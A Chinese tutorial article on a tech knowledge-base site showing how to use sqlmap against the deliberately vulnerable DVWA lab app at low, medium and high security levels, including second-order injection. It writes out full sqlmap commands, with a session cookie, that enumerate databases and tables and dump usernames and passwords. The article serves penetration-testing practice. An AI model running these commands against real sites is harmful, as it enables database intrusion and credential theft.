商务合作
  1. Worktile社区首页
  2. 其他

Sqlmap自动化注入的示例分析

亿速云 其他 阅读 586

Sqlmap自动化注入的示例分析

使用sqlmap对dvwa进行自动化注入
设置dvwa级别为low

  1. 打开dvwa的SQL Injection(SQL Injection (Blind)),打开浏览器调试,输入user id并submit,查看拦截到的请求。

  2. 可以看到是一条GET请求,url“http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”

  3. 我们直接放到salmap测试一下,使用-u命令 -u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#”

  4. 可以看到这里是需要登录的,否则跑不出来。所以我们需要添加一个cookie维持登录

6.使用burp suite代理抓包,获取登录的cookie,添加–dbs 爆数据 -u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” — cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” –dbs

可以看到爆出来的数据库是mysql

7. 我们用-D xxx指定查看的数据库,用–tables查看该数据库的所有表:-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa –tables

查看跑出来的结果:

8.我们用-D xxx -T ttt指定查看的表,用–columns查看表的列

-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa -T users –columns

9.我们用-D xxx查看数据库, -T xxx指定查看的表,用-C xxx查看表的列,用-dump查看列的数据

-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa -T users -C password,user –dump

  • 将dvwa安全等级调为medium将抓取的数据包保存为.txt文件,放到sqlmap的目录下,直接-r 文件名 –dbs(后续的参数自己添加即可)

  • 将dvwa 安全等级调为high。由于这次的提交页面跟返回结果的页面不是同一个页面,所以之前的那种方法在这里不能用了。要使用二阶注入的方法

  • 提交数据的网址

  • 返回的网址

将抓取的数据包保存为.txt文件,放到sqlmap的目录下,爆数据库,命令: -r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” — batch –level 2 –dbs

爆表名

-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” – -batch –level 2 -D dvwa –tables

爆列名

-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/”

— batch –level 2 -D dvwa -T user –columns

爆字段数据

-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” — batch –level 2 -D dvwa -T users -C user,password –dump

  • 一些概念问题:

  • 二阶注入:二阶sql注入–second-order有些时候注入点输入的数据看返回结果的时候并不是 当前的页面,而是另外的一个页面, 这时候就需要你指定到哪个页面获取响应判断真假。–second-url 后面跟一个返回的页面的URL地址

  • –batch:自动默认配置,不用手动按yes or no

  • level :Sqlmap一共有5个探测等级,默认是1。等级越高,说明探测时使用的payload也越多。其中5级的payload非常多,会自动破解出cookie、XFF等头部注入。当然,等级越高,探测的时间也越慢。这个参数会影响测试的注入点,GET和POST的数据都会进行测试,HTTP cookie在level为2时就会测试,HTTP User-Agent/Referer头在level为3时就会测试。在不确定哪个参数为注入点时,为了保证准确性,建议设置level为5(速度也随之变慢)

以上就是Sqlmap自动化注入的示例分析,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

文章标题:Sqlmap自动化注入的示例分析,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/26232

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
亿速云的头像亿速云认证作者
0 0
上一篇 2022年9月16日 下午10:42
下一篇 2022年9月16日 下午10:43

相关推荐

  • Laravel中如何找到最慢的查询 其他

    Laravel中如何找到最慢的查询

    DB::listen() 幸运的是,在 laravel 中,我们可以定义一个在每次执行查询时调用的回调(参见 此处)。为此,请将以下代码添加到任何服务提供者(例如 AppServiceProvider): public function boot(){ DB::listen(function ($q…

    亿速云的头像 亿速云
    2022年9月8日
    56400
  • TypeScript中怎么定义变量及使用数据类型 其他

    TypeScript中怎么定义变量及使用数据类型

    TypeScript定义变量 变量声明格式 我在前面强调过,在TypeScript中定义变量需要指定 标识符 的类型。 所以完整的声明格式如下: 声明了类型后TypeScript就会进行类型检测,声明的类型可以称之为类型注解; var/let/const 标识符: 数据类型 = 赋值; 比如我们声明…

    亿速云的头像 亿速云
    2022年8月31日
    1.3K00
  • 如何深度分析宽字节sql注入 其他

    如何深度分析宽字节sql注入

    基本概念 宽字节是相对于ascII这样单字节而言的;像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节 GBK是一种多字符的编码,通常来说,一个gbk编码汉字,占用2个字节。一个utf-8编码的汉字,占用3个字节 转义函数:为了过滤用户输入的…

    亿速云的头像 亿速云
    2022年9月21日
    1.3K00
  • cad快速看图标注看不见怎么解决 其他

    cad快速看图标注看不见怎么解决

    cad快速看图标注看不见解决方法: 1.把图纸上传到快看云盘,然后从云盘列表里打开这个图,点左侧的【同步标注】,名列前茅次使用云盘的请先登录账号、创建项目; 2.提示同步成功后,点云盘右上角的【成员】按钮,把对方的CAD快速看图账号添加为成员; 3.添加完成后,再点图纸左侧功能里的【成员协作】&#8…

    亿速云的头像 亿速云
    2022年9月1日
    1.2K00
  • MySQL乐观锁和悲观锁如何实现 其他

    MySQL乐观锁和悲观锁如何实现

    锁分类 MySQL的中锁按照范围主要分为表锁、行锁和页面锁。其中myisam存储引擎只支持表锁,InnoDB不仅仅支持行锁,在一定程度上也支持表锁。按照行为可以分为共享锁(读锁)、排他锁(写锁)和意向锁。按照思想分为乐观锁和悲观锁。 表结构 下面的SQL语句是表的结构: CREATE TABLE `…

    亿速云的头像 亿速云
    2022年9月8日
    54200
  • laravel是不是aop 其他

    laravel是不是aop

    laravel不是aop;aop是“Aspect Oriented Programming”的缩写,意为面向切面编程,是通过预编译方式和运行期间动态代理实现程序功能的统一维护的一种技术,而laravel不是面向切片编程,laravel中间件提供了一种方便的机制来检查和过滤进入应用程序的HTTP请求是…

    亿速云的头像 亿速云
    2022年9月1日
    50400
  • SQL怎么删除重复数据 其他

    SQL怎么删除重复数据

    1 SQL去重 SQL中去除完全相同数据可以用distinct关键字,任意字段去重可以用group by,以下面的数据表为例。 2 distinct 存在两条完全相同的纪录,用关键字distinct就可以去掉 根据单个字段去重,能精确去重; 作用在多个字段时,只有当这几个字段的完全相同时,才能去重;…

    亿速云的头像 亿速云
    2022年9月20日
    2.7K00
  • windows驱动精灵WiFi驱动怎么安装 其他

    windows驱动精灵WiFi驱动怎么安装

    驱动精灵WiFi驱动安装方法: 1、打开驱动精灵进入主页,点击右下角的“百宝箱”。 2、在百宝箱中选择“驱动管理”。 3、在设备中找到自己的“网卡驱动”。 4、如果没有的就点击“安装”,如果已安装过的点击“升级”即可。 以上就是关于“windows驱动精灵WiFi驱动怎么安装”这篇文章的内容,相信大…

    亿速云的头像 亿速云
    2022年9月13日
    59400
  • windows 0xc000007b修复了没用怎么解决 其他

    windows 0xc000007b修复了没用怎么解决

    解决方法: 方法一: 1、首先点击左下角开始菜单,找到“windows系统”下的“控制面板” 2、然后点击其中的“卸载程序”,将图示的两个程序给卸载。卸载完成后再重新下载安装。 3、重装完成后再去尝试打开软件或游戏应该就可以了。 方法二: 1、如果重装完vc还是启动不了,那么可以尝试重置系统。 2、…

    亿速云的头像 亿速云
    2022年9月15日
    52300
  • nwd文件怎么打开 其他

    nwd文件怎么打开

    nwd文件能够使用“Autodesk Navisworks”软件打开;该软件是一款用于分析、仿真和项目信息交流的全面审阅解决方案,被广泛应用于建筑工程项目管理和设计方面,该软件能够帮助用户提前预测和发现项目流程中的错误,避免这些问题导致项目的中断。 本教程操作环境:windows10系统、DELL …

    亿速云的头像 亿速云
    2022年9月8日
    1.4K00
注册PingCode 在线客服
站长微信
站长微信
电话联系

400-800-1024

工作日9:30-21:00在线

分享本页
返回顶部
PingCode智能化研发管理工具,25人以下免费使用。      亮数据-批量采集数据神器,LLM数据源轻松搞定。不成功不收费!